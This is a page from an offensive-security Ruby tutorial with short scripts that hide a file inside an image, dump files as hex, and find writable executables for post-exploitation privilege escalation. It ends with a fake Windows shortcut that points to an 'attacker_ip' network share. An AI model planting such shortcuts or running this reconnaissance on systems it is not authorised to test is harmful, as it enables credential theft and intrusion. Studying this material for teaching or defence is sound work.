Rubyfu
TwitterGithubNEW! Black Hat RubyBuy Me a Coffee
Search…
Primary version
Module 0x0 | Introduction
Contribution
Beginners
Required Gems
Module 0x1 | Basic Ruby Kung Fu
Module 0x2 | System Kung Fu
File manipulation
Parsing HTML, XML, JSON
Cryptography
Command Execution
Remote Shell
VirusTotal
Module 0x3 | Network Kung Fu
Module 0x4 | Web Kung Fu
Module 0x5 | Exploitation Kung Fu
Module 0x6 | Forensic Kung Fu
Module 0x7 | OSINT Kung Fu
References
FAQs
Contributors
Powered By GitBook
File manipulation

Simple Steganography

Simple script to hide a file file.pdf in an image image.png then write it into steg.png image which is originally the image.png Then, it recovers the file.pdf from steg.png to hola.pdf.
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
file1, file2 = ARGV
4
sec_file = File.read file1 # 'file.pdf'
5
nor_file = File.read file2 # 'image.png'
6
sep = '*------------------------*'
7
one_file = [nor_file, sep, sec_file]
8
​
9
# Write sec_file, sep, nor_file into steg.png
10
File.open("steg.png", 'wb') do |stg|
11
one_file.each do |f|
12
stg.puts f
13
end
14
end
15
​
16
# Read steg.png to be like "one_file" array
17
recov_file = File.read('steg.png').force_encoding("BINARY").split(sep).last
18
# Write sec_file to hola.pdf
19
File.open('hola.pdf', 'wb') {|file| file.print recov_file}
Copied!
Note: This has nothing to do with bypassing AV.

Simple Binary file to Hex

hex-simple.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# Simple file to hex converter script
4
#
5
file_name = ARGV[0]
6
​
7
file = File.open(file_name , 'rb')
8
file2hex = file.read.each_byte.map { |b| '\x%02x' % b }.join # b.to_s(16).rjust(2, '0')
9
​
10
puts file2hex
Copied!
1
ruby hex-simple.rb ../assembly/hellolinux
Copied!
Or in one command line
1
ruby -e "puts File.open('hellolinux').read.each_byte.map { |b| '\x%02X' % b }.join"
Copied!
return
1
\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00\xCC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xA2\x00\x00\x00\xA2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xA4\x00\x00\x00\xA4\x90\x04\x08\xA4\x90\x04\x08\x0E\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\xA4\x90\x04\x08\xBA\x0D\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80\x00\x00\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x2E\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xA4\x90\x04\x08\xA4\x00\x00\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB2\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Copied!
Note if want to change the hex prefix from \x to anything, just change '\x%x' to whatever you want, or remove it!.

Simple Hexdump

hexdump.rb
1
#!/usr/bin/env ruby
2
#
3
# Source: http://c2.com/cgi/wiki?HexDumpInManyProgrammingLanguages
4
#
5
def hexdump(filename, start = 0, finish = nil, width = 16)
6
ascii = ''
7
counter = 0
8
print '%06x ' % start
9
File.open(filename).each_byte do |c|
10
if counter >= start
11
print '%02x ' % c
12
ascii << (c.between?(32, 126) ? c : ?.)
13
if ascii.length >= width
14
puts ascii
15
ascii = ''
16
print '%06x ' % (counter + 1)
17
end
18
end
19
throw :done if finish && finish <= counter
20
counter += 1
21
end rescue :done
22
puts ' ' * (width - ascii.length) + ascii
23
end
24
​
25
if $0 == __FILE__
26
if ARGV.empty?
27
hexdump $0
28
else
29
filename = ARGV.shift
30
hexdump filename, *(ARGV.map {|arg| arg.to_i })
31
end
32
end
Copied!
1
ruby hexdump.rb hellolinux
Copied!
return
1
000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
2
000010 02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 ............4...
3
000020 cc 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 ........4. ...(.
4
000030 04 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
5
000040 00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 ................
6
000050 00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 ................
7
000060 a4 90 04 08 0e 00 00 00 0e 00 00 00 06 00 00 00 ................
8
000070 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
9
000080 b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba ................
10
000090 0d 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 ................
11
0000a0 cd 80 00 00 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 ....Hello, World
12
0000b0 21 0a 00 2e 73 68 73 74 72 74 61 62 00 2e 74 65 !...shstrtab..te
13
0000c0 78 74 00 2e 64 61 74 61 00 00 00 00 00 00 00 00 xt..data........
14
0000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
15
0000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
16
0000f0 00 00 00 00 0b 00 00 00 01 00 00 00 06 00 00 00 ................
17
000100 80 80 04 08 80 00 00 00 22 00 00 00 00 00 00 00 ........".......
18
000110 00 00 00 00 10 00 00 00 00 00 00 00 11 00 00 00 ................
19
000120 01 00 00 00 03 00 00 00 a4 90 04 08 a4 00 00 00 ................
20
000130 0e 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
21
000140 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 ................
22
000150 00 00 00 00 b2 00 00 00 17 00 00 00 00 00 00 00 ................
23
000160 00 00 00 00 01 00 00 00 00 00 00 00 ............
Copied!

Finding weak file permissions

One of the important task to do post exploitation is find weak executable file permissions which might be executed buy root/administrator user trying to elevate our privileges on the system. At the same time, our scripts must be applicable for all systems
find777.rb
1
# KING SABRI | @KINGSABRI
2
# Find all executable, writable files in the path
3
#
4
require 'find'
5
​
6
path = ARGV[0]
7
​
8
search = Find.find(path)
9
​
10
def wx_file(search)
11
search.select do |file|
12
File.file?(file) && File.executable?(file) && File.writable?(file)
13
end
14
end
15
​
16
puts wx_file search
Copied!
You can search for read, write, execute permissions, so your iteration block will be like
1
search.select do |file|
2
File.stat(file).mode.to_s(8)[-3..-1].to_i == 777
3
end
Copied!

Create Fake Windows shortcut

Install win32-shortcut gem
1
gem install win32-shortcut
Copied!
Note: this example works only on windows since it uses Windows APIs
1
# KING SABRI | @KINGSABRI
2
# gem install win32-shortcut
3
require 'win32/shotcut'
4
include Win32
5
​
6
Shortcut.new() do |s|
7
s.description = 'Rubyfu'
8
s.path = '\\attacker_ip\rubyfu.png'
9
s.show_cmd = Shortcut::SHOWNORMAL
10
s.icon_location = 'notepad.exe'
11
end
Copied!
Previous
Module 0x2 | System Kung Fu
Next
Parsing HTML, XML, JSON
Last modified 3yr ago
Copy link
Contents
Simple Steganography
Simple Binary file to Hex
Simple Hexdump
Finding weak file permissions
Create Fake Windows shortcut